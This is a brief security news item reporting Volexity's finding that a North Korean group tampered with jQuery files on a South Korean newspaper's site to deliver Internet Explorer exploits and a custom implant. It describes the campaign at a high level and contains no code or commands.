Security News > 2021 > August > NK Hackers Deploy Browser Exploits on South Korean Sites to Spread Malware

A North Korean threat actor has been discovered taking advantage of two exploits in Internet Explorer to infect victims with a custom implant as part of a strategic web compromise targeting a South Korean online newspaper.

The "Clever disguise of exploit code amongst legitimate code" and the use of custom malware enables the attackers to avoid detection, Volexity researchers said.

The attacks involved tampering with the jQuery JavaScript libraries hosted on the website to serve additional obfuscated JavaScript code from a remote URL, using it to leverage exploits for two Internet Explorer flaws that were patched by Microsoft in August 2020 and March 2021.

It's worth noting that both the flaws have been actively exploited in the wild, with the latter put to use by North Korean hackers to compromise security researchers working on vulnerability research and development in a campaign that came to light earlier this January.

In a separate set of attacks disclosed last month, an unidentified threat actor was found exploiting the same flaw to deliver a fully-featured VBA-based remote access trojan on compromised Windows systems.

"The use of recently patched exploits for Internet Explorer and Microsoft Edge will only work against a limited audience."

News URL

http://feedproxy.google.com/~r/TheHackersNews/~3/f3Q4pG8_fI8/nk-hackers-deploy-browser-exploit-on.html